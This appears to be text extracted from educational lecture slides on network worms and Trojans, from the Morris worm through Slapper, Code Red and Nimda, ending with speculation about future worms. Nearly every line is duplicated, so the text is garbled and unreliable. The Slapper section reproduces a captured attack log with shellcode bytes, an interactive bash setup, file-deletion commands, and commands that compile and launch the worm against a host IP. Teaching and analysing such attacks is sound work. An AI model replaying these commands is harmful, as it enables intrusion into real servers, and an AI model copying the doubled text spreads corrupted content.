• Worms vs. VirusesWorms vs. Viruses– Viruses require interactionViruses require interaction– Worms act on their ownWorms act on their own– Viruses use social attacksViruses use social attacks– Worms use technical attacksWorms use technical attacks


Worms at a GlanceWorms at a Glance

• Main goal is to disrupt network and deny accessMain goal is to disrupt network and deny access• Many shut down anti-virus and firewall Many shut down anti-virus and firewall

applicationsapplications• Not concerned about detectionNot concerned about detection• 1988 – Shut down 3,000-6,000 computers (5-1988 – Shut down 3,000-6,000 computers (5-

10% of the Internet)10% of the Internet)• Growing trend of worms making the headlines Growing trend of worms making the headlines

rather than true virusesrather than true viruses– Code Red Code Red – NimdaNimda– OpaservOpaserv


The Worm’s BeginningsThe Worm’s Beginnings

• John Shoch invented the concept at Xerox’s John Shoch invented the concept at Xerox’s Palo Alto research labs in 1978Palo Alto research labs in 1978

• Designed as a Designed as a usefuluseful tool that borrowed clock tool that borrowed clock cycles from idle CPUscycles from idle CPUs

• Actually got out of control back then as wellActually got out of control back then as well


Morris Internet WormMorris Internet Worm

On November 2, 1988, Robert Morris, Jr., a graduate student in On November 2, 1988, Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-Computer Science at Cornell, wrote an experimental, self-replicating, self-propagating 99 line program called a replicating, self-propagating 99 line program called a wormworm and injected it into the Internet. He chose to release it from MIT and injected it into the Internet. He chose to release it from MIT to disguise the fact that the worm came from Cornell. Morris to disguise the fact that the worm came from Cornell. Morris soon discovered that the program was replicating and infecting soon discovered that the program was replicating and infecting machines at a much faster rate than he had anticipated---there machines at a much faster rate than he had anticipated---there was a bug. Ultimately, many machines at locations around the was a bug. Ultimately, many machines at locations around the country either crashed or became ``catatonic.'' When Morris country either crashed or became ``catatonic.'' When Morris realized what was happening, he contacted a friend at Harvard realized what was happening, he contacted a friend at Harvard to discuss a solution. Eventually, they sent an anonymous to discuss a solution. Eventually, they sent an anonymous message from Harvard over the network, instructing message from Harvard over the network, instructing programmers how to kill the worm and prevent re-infection…programmers how to kill the worm and prevent re-infection…The estimated cost of dealing with the worm at each The estimated cost of dealing with the worm at each installation ranged from $200 to more than $53,000.installation ranged from $200 to more than $53,000.


How it Didn’t Bring How it Didn’t Bring 6,000 Machines Down6,000 Machines Down

• The worm didn't alter or destroy files The worm didn't alter or destroy files • The worm didn't save or transmit the passwords which it The worm didn't save or transmit the passwords which it

cracked cracked • The worm didn't make special attempts to gain root or The worm didn't make special attempts to gain root or

superuser access in a system (and didn't utilize the privileges if superuser access in a system (and didn't utilize the privileges if it managed to get them)it managed to get them)

• The worm didn't place copies of itself or other programs into The worm didn't place copies of itself or other programs into memory to be executed at a later time. (Such programs are memory to be executed at a later time. (Such programs are commonly referred to as timebombs) commonly referred to as timebombs)

• The worm didn't attack machines other than Sun 3 systems The worm didn't attack machines other than Sun 3 systems and VAX computers running 4 BSD Unix (or equivalent)and VAX computers running 4 BSD Unix (or equivalent)

• The worm didn't attack machines that weren’t attached to the The worm didn't attack machines that weren’t attached to the internetinternet

• The worm didn't travel from machine to machine via diskThe worm didn't travel from machine to machine via disk• The worm didn't cause physical damage to computer systemsThe worm didn't cause physical damage to computer systems


How it Did Take 10% of How it Did Take 10% of the Net Downthe Net Down

• Utilized a variety of Unix security holesUtilized a variety of Unix security holes– Sendmail remote debugSendmail remote debug

• Allowed the worm to execute remote commands on the Allowed the worm to execute remote commands on the systemsystem

– Obtained user listsObtained user lists• Ran dictionary attack of 432 “common” passwords on Ran dictionary attack of 432 “common” passwords on

user listsuser lists• Most passwords today are as insecure as 1988Most passwords today are as insecure as 1988


How the First Worm How the First Worm Changed System Changed System AdministrationAdministration

• File access should be limited (the worm could open the File access should be limited (the worm could open the encrypted password file)encrypted password file)

• Networks should use a conglomerate of OSesNetworks should use a conglomerate of OSes– i.e. a UNIX virus won’t infect a Win2k serveri.e. a UNIX virus won’t infect a Win2k server

• Brought about forums of geeks (Us) for sharing researchBrought about forums of geeks (Us) for sharing research• Beware of reflexes! Many S.A.’s shut down sendmail to stop Beware of reflexes! Many S.A.’s shut down sendmail to stop

the virus, but only delayed information on how to patch & fix itthe virus, but only delayed information on how to patch & fix it• Logs are monotonous but are extremely useful in Logs are monotonous but are extremely useful in

troubleshootingtroubleshooting


Internet WormsInternet Worms

• First worms were actually designed and First worms were actually designed and released in the 1980’sreleased in the 1980’s

• Worms were non-destructive and Worms were non-destructive and generally were released to perform generally were released to perform helpful network taskshelpful network tasks– Vampire worm: idle during the day, at night Vampire worm: idle during the day, at night

would use spare CPU cycles to perform would use spare CPU cycles to perform complex tasks that required the extra complex tasks that required the extra computing powercomputing power


Internet WormsInternet Worms

• Eventually negative aspects of worms Eventually negative aspects of worms came to lightcame to light– An internal Xerox worm had crashed all the An internal Xerox worm had crashed all the

computers in a particular research centercomputers in a particular research center– When machines were restarted the worm re-When machines were restarted the worm re-

propagated and crashed the machines againpropagated and crashed the machines again


Six Components of Six Components of WormsWorms

• ReconnaissanceReconnaissance• Specific AttacksSpecific Attacks• Command InterfaceCommand Interface• Communication MechanismsCommunication Mechanisms• Intelligence CapabilitiesIntelligence Capabilities• Unused and Non-attack CapabilitiesUnused and Non-attack Capabilities


ReconnaissanceReconnaissance

• Target identificationTarget identification• Active methodsActive methods

– scanningscanning

• Passive methodsPassive methods– OS fingerprintingOS fingerprinting– traffic analysistraffic analysis


Specific AttacksSpecific Attacks

• ExploitsExploits– buffer overflows, cgi-bin, etc.buffer overflows, cgi-bin, etc.– Trojan horse injectionsTrojan horse injections

• Limited in targetsLimited in targets• Two componentsTwo components

– local, remotelocal, remote


Command InterfaceCommand Interface

• Interface to compromised systemInterface to compromised system– administrative shelladministrative shell– network clientnetwork client

• Accepts instructionsAccepts instructions– personperson– other worm nodeother worm node


CommunicationsCommunications

• Information transferInformation transfer• ProtocolsProtocols• Stealth concernsStealth concerns


Intelligence DatabaseIntelligence Database

• Knowledge of other nodesKnowledge of other nodes• Concrete vs. abstractConcrete vs. abstract• Complete vs. incompleteComplete vs. incomplete


UNIX WormsUNIX Worms

• Ramen Worm (01/2001)Ramen Worm (01/2001)• Lion Worm (02/2001)Lion Worm (02/2001)• Adore Worm (04/2001)Adore Worm (04/2001)• Cheese Worm (05/2001)Cheese Worm (05/2001)• Sadmind Worm (05/2001)Sadmind Worm (05/2001)• Scalper Worm (07/2002)Scalper Worm (07/2002)• Slapper Worm (09/2002)Slapper Worm (09/2002)


Ramen WormRamen Worm

• First discovered in January of 2001First discovered in January of 2001• Attacks RedHat Linux 6.2, 7.0 systemsAttacks RedHat Linux 6.2, 7.0 systems• The worm randomly selects a class B The worm randomly selects a class B

address and attempts to use well known address and attempts to use well known exploits against rpc.statd, wu-ftpd and exploits against rpc.statd, wu-ftpd and LPRng to gain accessLPRng to gain access


Ramen Worm: DetectionRamen Worm: Detection

• If you’re running a web server, the worm If you’re running a web server, the worm replaces your index.html with replaces your index.html with

• Starts a http daemon on tcp port 27374 Starts a http daemon on tcp port 27374 for newly infected hosts to download codefor newly infected hosts to download code

click


Ramen Worm: Added Ramen Worm: Added featurefeature

• Note: The worm patches the holes it Note: The worm patches the holes it used to gain access so no other system used to gain access so no other system cracker can get in. (Isn’t that nice of cracker can get in. (Isn’t that nice of them!)them!)


Lion WormLion Worm

• Exploits weakness in BIND to gain root Exploits weakness in BIND to gain root accessaccess

• Listens on port 27374Listens on port 27374• Sends out email to [email protected] Sends out email to [email protected]

with /etc/passwd, /etc/shadow and with /etc/passwd, /etc/shadow and network settingsnetwork settings

• Randomly generates class B network Randomly generates class B network addresses to scanaddresses to scan

• Scans network for exploitable hostsScans network for exploitable hosts


Lion WormLion Worm

• Once it exploits a host, it installs the Once it exploits a host, it installs the t0rn root kit. t0rn root kit.

• Ports 60008/tcp and 33567/tcp get Ports 60008/tcp and 33567/tcp get bound to a backdoor root shellbound to a backdoor root shell

• A trojaned version of SSH gets bound to A trojaned version of SSH gets bound to 33568/tcp33568/tcp


Adore WormAdore Worm

• First appeared around April 1, 2001First appeared around April 1, 2001• Similar to Ramen and LionSimilar to Ramen and Lion• Exploits BIND, rpc.statd, LPRng on Redhat Exploits BIND, rpc.statd, LPRng on Redhat

Linux systemsLinux systems• Emails information, including /etc/passwd Emails information, including /etc/passwd

to a few different email addressesto a few different email addresses


Cheese WormCheese Worm

• The 'cheese worm' is a worm designed to The 'cheese worm' is a worm designed to remove all inetd services referencing '/bin/sh' remove all inetd services referencing '/bin/sh' from systems with root shells listening on TCP from systems with root shells listening on TCP port 10008 a signature of the li0n worm. port 10008 a signature of the li0n worm. Although this can be seen as a self-spreading Although this can be seen as a self-spreading patch, in reality, the 'cheese worm' will attempt patch, in reality, the 'cheese worm' will attempt to execute a series of shell commands on any to execute a series of shell commands on any host which accepts TCP connections on TCP host which accepts TCP connections on TCP port 10008. port 10008.

• The 'cheese worm' perpetuates its attack cycle The 'cheese worm' perpetuates its attack cycle across multiple hosts by copying itself from across multiple hosts by copying itself from attacking host to victim host and self-initiating attacking host to victim host and self-initiating another attack cycle. Thus, no human another attack cycle. Thus, no human intervention is required to perpetuate the cycle intervention is required to perpetuate the cycle once the worm has begun to propagate. once the worm has begun to propagate.


sadmind/IIS Wormsadmind/IIS Worm

• The worm uses two well-known vulnerabilities to The worm uses two well-known vulnerabilities to compromise systems and deface web pages. compromise systems and deface web pages.

• Sadmind/IIS propagates using a buffer overrun exploit on Sadmind/IIS propagates using a buffer overrun exploit on Solaris systems in the sadmind program, part of the Solaris systems in the sadmind program, part of the Solstice AdminSuite. Solstice AdminSuite.

• After successfully compromising the Solaris systems, it After successfully compromising the Solaris systems, it uses the “Web Server Folder Directory Traversal" uses the “Web Server Folder Directory Traversal" vulnerability to compromise the IIS systems. vulnerability to compromise the IIS systems.

• When the worm attacks a system it will append the text When the worm attacks a system it will append the text "+ +" to the .rhosts file belonging to root. It will then "+ +" to the .rhosts file belonging to root. It will then copy the worm to the new machine and extract into a copy the worm to the new machine and extract into a new /dev/cuc directory. /etc/rc.d/S71rpc will be changed new /dev/cuc directory. /etc/rc.d/S71rpc will be changed so the worm is started when the system is started and so the worm is started when the system is started and then that file will be run to make the worm active then that file will be run to make the worm active immediately. immediately.


Sadmind WormSadmind Worm


Scalper WormScalper Worm• This worm spreads over Apache web servers on This worm spreads over Apache web servers on

FreeBSD by using the Chunked Encoding FreeBSD by using the Chunked Encoding exploit.exploit.

• It first sends an ordinary request to the server. It first sends an ordinary request to the server. If it gets a reply back saying that the server is If it gets a reply back saying that the server is Apache it will send the exploit regardless of the Apache it will send the exploit regardless of the target server being vulnerable or not. The target server being vulnerable or not. The worm appears to give an attacker remote worm appears to give an attacker remote control abilities, including DDoS capability. control abilities, including DDoS capability.

• Each worm installation keeps in memory a list Each worm installation keeps in memory a list of all the IPs infected from it so that all infected of all the IPs infected from it so that all infected servers are connected in a tree like fashion. servers are connected in a tree like fashion.


Slapper WormSlapper Worm• Slapper is a improved version of the Linux/FreeBSD Slapper is a improved version of the Linux/FreeBSD

Scalper worm. Slapper is using the OpenSSL mod_ssl Scalper worm. Slapper is using the OpenSSL mod_ssl exploit discovered in August, 2002. exploit discovered in August, 2002.

• The Slapper worm scans for vulnerable systems on The Slapper worm scans for vulnerable systems on 80/tcp using an invalid HTTP GET request. Once infected, 80/tcp using an invalid HTTP GET request. Once infected, the victim server begins scanning for additional hosts to the victim server begins scanning for additional hosts to continue the worm's propagation.continue the worm's propagation.

• Additionally, the Slapper worm can act as an attack Additionally, the Slapper worm can act as an attack platform for distributed denial-of-service (DDoS) platform for distributed denial-of-service (DDoS) – (UDP, Tcp and IPv6 floods) (UDP, Tcp and IPv6 floods)

• Potentially destructive (corrupts data while replicating)Potentially destructive (corrupts data while replicating)• Slapper did take a big evolutionary step by creating a Slapper did take a big evolutionary step by creating a

peer-to-peer network.peer-to-peer network.• Considered a hint of what future cyberweapons may Considered a hint of what future cyberweapons may

look like look like


+

Slapper Get RequestSlapper Get Request

HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10 GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 PHP/ 4.0.6 mod_perl/1.24_01..Connection: close..Transfer-Encoding: chunked..Content-Type: text/html; charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad quest</TITLE>. </HEAD> <BODY>.<H1>Bad Request</H1>.Your browser sent a request that this server could not understand.<P>.client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): <P>. <HR>. <ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port 80</ADDRESS>.</BODY></HTML>...0....

68.168.1.15:52160 -> 127.0.0.1:80GET / HTTP/1.1....

127.0.0.1:80 -> 68.168.1.15:52160 :52160


The AttackThe Attack

...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-.....

.........hjE.H.o.,B...."Oo...:.....'...i..%._~-...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G@AAAA............AAAAAAAA....................................1....w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A..1...Q[....1.Ph//shh/bin..PS.......

[..]

68.168.1.15:52312 -> 127.0.0.1:443export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.

68.168.1.15:52312 -> 127.0.0.1:443


Compiling and InstallingCompiling and Installing

rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update; exit; .

68.168.1.15:52312 -> 127.0.0.1:443

rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp /update /tmp/.unlock; .cat > /tmp/.unlock.uu << __eof__; .begin 655 .unlock [worm source code, in uuencoded format, omitted]

68.168.1.15:52312 -> 127.0.0.1:443

uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o /tmp/update /tmp/.update.c;./tmp/httpd 68.168.1.15; /tmp/update; .

68.168.1.15:52312 -> 127.0.0.1:443


Remote CommunicationsRemote Communications

obs: XXXX XXXX == localhost IP YYYY YYYY == worm_host IP 0x70 == Incomming client flag

127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)

0x0000 4500 0038 0000 4000 4011 beb3 XXXX XXXX E..8..@[email protected] YYYY YYYY 103c 103c 0024 92cb 0000 0000 ...'.<.<.$......0x0020 8fff 0000 25b8 aaa8 7000 0000 0000 0000 ....%...p....... ^^


Worm PropagationWorm Propagation

• Central Source Propagation Central Source Propagation – This type of propagation involves a central This type of propagation involves a central

location where after a computer is infected it location where after a computer is infected it locates a source where it can get code to locates a source where it can get code to copy into the compromised computer then copy into the compromised computer then after it infects the current computer it finds after it infects the current computer it finds the next computer and then everything the next computer and then everything starts over again. And example of the this starts over again. And example of the this kind of worm is the 1i0n worm. kind of worm is the 1i0n worm.



• Back-Chaining PropagationBack-Chaining Propagation– The Cheese worm is an example of this type The Cheese worm is an example of this type

of propagation where the attacking of propagation where the attacking computer initiates a file transfer to the computer initiates a file transfer to the victim computer. After initiation, the victim computer. After initiation, the attacking computer can then send files and attacking computer can then send files and any payload over to the victim without any payload over to the victim without intervention. Then the victim becomes the intervention. Then the victim becomes the attacking computer in the next cycle with a attacking computer in the next cycle with a new victim. This method of propagation is new victim. This method of propagation is more reliable then central source because more reliable then central source because central source data can be cut off. central source data can be cut off.



• Autonomous PropagationAutonomous Propagation– Autonomous worms attack the victim Autonomous worms attack the victim

computer and insert the attack instructions computer and insert the attack instructions directly into the processing space of the directly into the processing space of the victim computer which results in the next victim computer which results in the next attack cycle to initiate without any additional attack cycle to initiate without any additional file transfer. Code Red is an example of this file transfer. Code Red is an example of this type of worm. The original Morris worm of type of worm. The original Morris worm of 1988 was of this nature as well.1988 was of this nature as well.


Windows WormsWindows Worms

• Code Red Code Red • NimdaNimda


Windows WormsWindows Worms

• Code Red infected over 250,000 Code Red infected over 250,000 systems in 9 hours on July 19, 2001.systems in 9 hours on July 19, 2001.

• NIMDA and Code Red worms cost NIMDA and Code Red worms cost business 3 - 4 billion dollars.business 3 - 4 billion dollars.


W32/Bady.worm (Code W32/Bady.worm (Code Red)Red)

InfectionInfection• Exploits the buffer overflow vulnerability Exploits the buffer overflow vulnerability

associated with “idq.dll". idq.dll provides associated with “idq.dll". idq.dll provides support for internet data administrative support for internet data administrative script files ".ida" and internet data script files ".ida" and internet data queries files ".idq" for indexing server queries files ".idq" for indexing server 2.0 and indexing services. 2.0 and indexing services.

• The malicious code is not saved as a file, The malicious code is not saved as a file, but is inserted into and then run directly but is inserted into and then run directly from memory.from memory.

• Static wormStatic worm


W32/Bady.worm (Code W32/Bady.worm (Code Red) Red) PropagationPropagation

• If the file C:\Notworm does not exist, then If the file C:\Notworm does not exist, then new threads are created. If the date is new threads are created. If the date is before the 20th of the month, the next 99 before the 20th of the month, the next 99 threads attempt to exploit more threads attempt to exploit more computers by targeting random IP computers by targeting random IP addresses. addresses.

• The worm sends its code as an HTTP The worm sends its code as an HTTP request. The HTTP request exploits a request. The HTTP request exploits a known buffer-overflow vulnerability, which known buffer-overflow vulnerability, which allows the worm to run on your computer. allows the worm to run on your computer.

• Use in-memory copyUse in-memory copy


W32/Bady.worm (Code W32/Bady.worm (Code Red) Red) PayloadPayload

• Denial of Service by sending large amounts of Denial of Service by sending large amounts of junk data to port 80 (Web service) of junk data to port 80 (Web service) of 198.137.240.91, which was 198.137.240.91, which was www.whitehouse.gov. This IP address has been www.whitehouse.gov. This IP address has been changed and is no longer active.changed and is no longer active.

• If the default language of the computer is U.S. If the default language of the computer is U.S. English, further threads cause Web pages to English, further threads cause Web pages to appear defaced. First, the thread sleeps two appear defaced. First, the thread sleeps two hours and then hooks a function, which hours and then hooks a function, which responds to HTTP requests. Instead of responds to HTTP requests. Instead of returning the correct Web page, the worm returning the correct Web page, the worm returns its own HTML code. web page deliveryreturns its own HTML code. web page delivery


W32/Bady.worm (Code W32/Bady.worm (Code Red)Red)


Code Red IICode Red IIInfectionInfection

• Exploits security vulnerability with idq.dll that contains an Exploits security vulnerability with idq.dll that contains an unchecked buffer in a section of code that handles input unchecked buffer in a section of code that handles input URLs. Idq.dll runs in the System context, so exploiting the URLs. Idq.dll runs in the System context, so exploiting the vulnerability gives the attacker complete control of the vulnerability gives the attacker complete control of the server.server.

• The worm first calls its initialization routine, which identifies The worm first calls its initialization routine, which identifies the base address of Kernel32.dll in the process address the base address of Kernel32.dll in the process address space of the IIS Server service.space of the IIS Server service.

• It then loads WS2_32.dll to access functions such as socket, It then loads WS2_32.dll to access functions such as socket, closesocket and WSAGetLastError. From User32.dll, it gets closesocket and WSAGetLastError. From User32.dll, it gets ExitWindowsEx that is used by the worm to reboot the ExitWindowsEx that is used by the worm to reboot the system.system.

• The main thread checks for two different markers. The first The main thread checks for two different markers. The first marker, "29A," controls the installation of the marker, "29A," controls the installation of the Trojan.VirtualRoot. The other marker is a semaphore named Trojan.VirtualRoot. The other marker is a semaphore named "CodeRedII." If the semaphore exists, the worm goes into an "CodeRedII." If the semaphore exists, the worm goes into an infinite sleep. infinite sleep.


Code Red IICode Red IIPropagationPropagation

• If the default language is Chinese (either If the default language is Chinese (either Taiwan or PRC), it creates 600 new Taiwan or PRC), it creates 600 new threads; otherwise, it creates 300. These threads; otherwise, it creates 300. These threads generate random IP addresses threads generate random IP addresses which are used to search for new Web which are used to search for new Web servers to infect. servers to infect.

• Statistical distribution of random Statistical distribution of random address, favoring topologically closer address, favoring topologically closer hostshosts


Code Red IICode Red IIPayloadPayload

• The Trojan (C:\Explorer.exe) sleeps for a few minutes and The Trojan (C:\Explorer.exe) sleeps for a few minutes and resets these keys to assure that the registry keys are modified.resets these keys to assure that the registry keys are modified.

• If the Trojan that is dropped by the worm has modified the If the Trojan that is dropped by the worm has modified the registry keyregistry key

HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\W3SVC\Parameters\Virtual RootsHKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\W3SVC\Parameters\Virtual Roots

(by adding a few new keys and setting the user group to 217), (by adding a few new keys and setting the user group to 217), it allows a hacker to take full control of the Web server by it allows a hacker to take full control of the Web server by sending an HTTP GET request to run scripts/root.exe on the sending an HTTP GET request to run scripts/root.exe on the infected Web server.infected Web server.

• Copies Cmd.exe from the Windows NT \System folder to the Copies Cmd.exe from the Windows NT \System folder to the following folders (if they exist).following folders (if they exist).– C:\Inetpub\Scripts\Root.exeC:\Inetpub\Scripts\Root.exe– D:\Inetpub\Scripts\Root.exeD:\Inetpub\Scripts\Root.exe– C:\Progra~1\Common~1\System\MSADC\Root.exeC:\Progra~1\Common~1\System\MSADC\Root.exe– D:\Progra~1\Common~1\System\MSADC\Root.exeD:\Progra~1\Common~1\System\MSADC\Root.exe


[email protected]@mm InfectionInfection

• The worm uses the Unicode Web Traversal exploit The worm uses the Unicode Web Traversal exploit • The worm is started as ADMIN.DLL on infected The worm is started as ADMIN.DLL on infected

webservers. The worm starts to scan and infect files webservers. The worm starts to scan and infect files on all available drives including removable and on all available drives including removable and network ones. The EXE files (except WINZIP32.EXE) network ones. The EXE files (except WINZIP32.EXE) on these drives will get infected with the worm. on these drives will get infected with the worm.

• The infection technique is unique - the worm puts an The infection technique is unique - the worm puts an infected file inside its body as a resource. When the infected file inside its body as a resource. When the infected file is run, the worm extracts the embedded infected file is run, the worm extracts the embedded original EXE file, runs it and tries to delete it original EXE file, runs it and tries to delete it afterwards. If instant deletion is not possible, the afterwards. If instant deletion is not possible, the worm creates worm creates WININIT.INIWININIT.INI file that will delete the file that will delete the extracted file on next Windows startup. extracted file on next Windows startup.


[email protected]@mmPropagationPropagation

• The worm searches trough all the '.htm' and The worm searches trough all the '.htm' and '.html' file in the Temporary Internet Files folder '.html' file in the Temporary Internet Files folder for e-mail addresses. It reads trough user's inbox for e-mail addresses. It reads trough user's inbox and collects the sender addresses. When the and collects the sender addresses. When the address list is ready it uses it's own SMTP engine address list is ready it uses it's own SMTP engine to send the infected messages. to send the infected messages.

• The worm uses backdoors on IIS servers such as The worm uses backdoors on IIS servers such as the one CodeRed II installs. It scans random IP the one CodeRed II installs. It scans random IP addresses for these backdoors. When a host is addresses for these backdoors. When a host is found to have one the worm instructs the found to have one the worm instructs the machine to download the worm code (Admin.dll) machine to download the worm code (Admin.dll) from the host used for scanning. After this it from the host used for scanning. After this it executes the worm on the target machine this executes the worm on the target machine this way infecting it. way infecting it.


[email protected]@mmPayloadPayload

• Payload: Payload: – Large scale e-mailing: Uses MAPI to send Large scale e-mailing: Uses MAPI to send

itself out as Readme.exe (Readme.exe may itself out as Readme.exe (Readme.exe may NOT be visible as an attachment in the email NOT be visible as an attachment in the email received) received)

– Modifies files: Replaces multiple legitimate Modifies files: Replaces multiple legitimate files with itself. files with itself.

– Degrades performance: May cause system Degrades performance: May cause system slowdown slowdown

– Compromises security settings: Opens the C Compromises security settings: Opens the C drive as a network sharedrive as a network share


[email protected]@mm

• On September 20, 2001 1200 computers On September 20, 2001 1200 computers at the Fairfax County Library were hit by at the Fairfax County Library were hit by the Nimda virus forcing all of them off the Nimda virus forcing all of them off the network. 150 technicians from the network. 150 technicians from Virginia’s Department of Information Virginia’s Department of Information Technology were called in to help deal Technology were called in to help deal with cleaning the computers – from 30 with cleaning the computers – from 30 minutes to 3 hours each!minutes to 3 hours each!


The Future of WormsThe Future of Worms

• Client and Server-Side FlawsClient and Server-Side Flaws– Buffer overflowsBuffer overflows– Format string attacksFormat string attacks– Design flawsDesign flaws– Open sharesOpen shares– MisconfigurationsMisconfigurations


Current LimitationsCurrent Limitations

• Limited capabilitiesLimited capabilities• Growth and traffic patternsGrowth and traffic patterns• Network structureNetwork structure• Intelligence DatabaseIntelligence Database


Limited Capabilities: Limited Capabilities: ReconRecon

RPCRPC

IISIIS

SNMPSNMP

FTPFTP

LPDLPD

TargetTarget

TargetTarget

TargetTarget

TargetTarget

TargetTarget

TargetTarget


Limited Capabilities: Limited Capabilities: AttackAttack

3333

2222

1111

TargetTarget

if {1|2|3}if {1|2|3}

attackattack

elseelse

abortabort

endend

????


Network StructureNetwork Structure

EarlyEarly LateLate


Network TopologyNetwork Topology

EarlyEarly

LateLate


Limitations of Limitations of DirectionalityDirectionality

Target Target NetworkNetwork


Intelligence DatabaseIntelligence Database

NNNN

NNNN

IIII

NNNN

NNNN

NNNN

NNNN

NNNN

IIII


Limitations ConclusionsLimitations Conclusions

• Highly visibleHighly visible• Easily BlockedEasily Blocked

– need a signatureneed a signature

• Unable to achieve a specific targetUnable to achieve a specific target• Readily caughtReadily caught


Future ConsiderationsFuture Considerations

• Dynamic behaviorDynamic behavior• Dynamic updates Dynamic updates • Communications mechanismsCommunications mechanisms• Infection mechanismsInfection mechanisms• Network topologiesNetwork topologies• Communications topologyCommunications topology• New targetsNew targets


Dynamic BehaviorDynamic Behavior

GREGREGREGRE

TCP/80TCP/80TCP/80TCP/80

TCPTCPTCPTCP

NNTPNNTPNNTPNNTP

ICMP 8.0ICMP 8.0ICMP 8.0ICMP 8.053/UDP53/UDP53/UDP53/UDP SMTPSMTPSMTPSMTP


Dynamic BehaviorDynamic Behavior

CommunicationCommunicationss

PlatformsPlatforms

AttacksAttacks

Dynamic invocation of capabilitiesDynamic invocation of capabilities


Dynamic Network RolesDynamic Network Roles

IIII RRRR

AAAATargetTarget

Not every node contains all componentsNot every node contains all components


Updates to the NodesUpdates to the Nodes

ReleaseRelease

RetrieveRetrieve


Embedding MessagesEmbedding Messages

• ImagesImages• TextText• MP3 filesMP3 files

• Usenet, web, mailing listsUsenet, web, mailing lists• Freenet, Gnutella, NapsterFreenet, Gnutella, Napster


New TargetsNew Targets

• Embedded devicesEmbedded devices– bugsbugs– prevalence on broadbandprevalence on broadband

• Large audience targetsLarge audience targets– Akamai clientsAkamai clients– Political, financial motivationsPolitical, financial motivations


The Future of WormsThe Future of WormsEncryption/Obfuscation/Encryption/Obfuscation/

PolymorphismPolymorphism

• Covert Channel / Stealth WormsCovert Channel / Stealth Worms– Hiding in plain sightHiding in plain sight– ICMPICMP– Encoding in normal data streamEncoding in normal data stream– Nonstandard Nonstandard



Encryption/Obfuscation/Encryption/Obfuscation/PolymorphismPolymorphism

• Keyed PayloadsKeyed Payloads– Keying a worm before sending, requiring the Keying a worm before sending, requiring the

worm to “call back” to decode itself.worm to “call back” to decode itself.– Clear text worm never transmitsClear text worm never transmits– Higher chance of missing key transmissions, Higher chance of missing key transmissions,

less likely to get a worm to disassembleless likely to get a worm to disassemble



Encryption/Obfuscation/PolymorphismEncryption/Obfuscation/Polymorphism

• Standard Polymorphic/Mutation Standard Polymorphic/Mutation TechniquesTechniques– Worms meet virusesWorms meet viruses– Continuously changing itselfContinuously changing itself– Brute forcing new offsetsBrute forcing new offsets– Adapting to the environment to become Adapting to the environment to become

“more fit”“more fit”



““Andy Warhole”Andy Warhole”

• Flash WormsFlash Worms– Faster, more accurate spreadFaster, more accurate spread– Complete spread of all possible targets in 5-Complete spread of all possible targets in 5-

20 minutes20 minutes– Very low false positive rateVery low false positive rate– Too fast to analyze/disseminate informationToo fast to analyze/disseminate information



Intelligent WormsIntelligent Worms

• Worms meet AIWorms meet AI– Worm infected hosts communicating in a Worm infected hosts communicating in a

p2p methodp2p method– Exchanging information on targeting, Exchanging information on targeting,

propagation, or new infection methodspropagation, or new infection methods– Agent-like behavior Agent-like behavior



Intelligent WormsIntelligent Worms

• Intelligence DatabaseIntelligence Database• Knowledge of other nodesKnowledge of other nodes• Concrete vs. abstractConcrete vs. abstract• Complete vs. incompleteComplete vs. incomplete



Bigger ScopeBigger Scope

• Multi-Platform / OS WormsMulti-Platform / OS Worms– Multi-OS shell codeMulti-OS shell code– Attacking multiple different vulnerabilities on Attacking multiple different vulnerabilities on

multiple platformsmultiple platforms– Single worm code, large attackable base Single worm code, large attackable base

TrojansTrojans

From Quick From Quick Thinking Greeks …Thinking Greeks …to Quick Thinking to Quick Thinking

GeeksGeeks


• A small program that is designed to appear desirable but is in A small program that is designed to appear desirable but is in fact maliciousfact malicious

• Must be run by the userMust be run by the user• Do not replicate themselvesDo not replicate themselves• Used to take over a computer, or steal/delete dataUsed to take over a computer, or steal/delete data• Good Trojans will not:Good Trojans will not:

– alert the user alert the user – alter the way their computer works alter the way their computer works

Yeah, but what’s a Yeah, but what’s a Trojan?Trojan?


Trojan HorsesTrojan Horses

• A program which appears to be A program which appears to be legitimate, but performs unintended legitimate, but performs unintended actions.actions.

• Trojan Horses can install backdoors, Trojan Horses can install backdoors, perform malicious scanning, monitor perform malicious scanning, monitor system logins and other malicious system logins and other malicious activities.activities.


TrojansTrojans

• An easy weapon for script-kiddies to wreak havoc on the An easy weapon for script-kiddies to wreak havoc on the Internet. Internet.

• They are a program that hides behind a potentially They are a program that hides behind a potentially valuable or entertaining program. Trojan horses can be valuable or entertaining program. Trojan horses can be viruses or remote control programs that provide viruses or remote control programs that provide complete access to a victim’s computer.complete access to a victim’s computer.

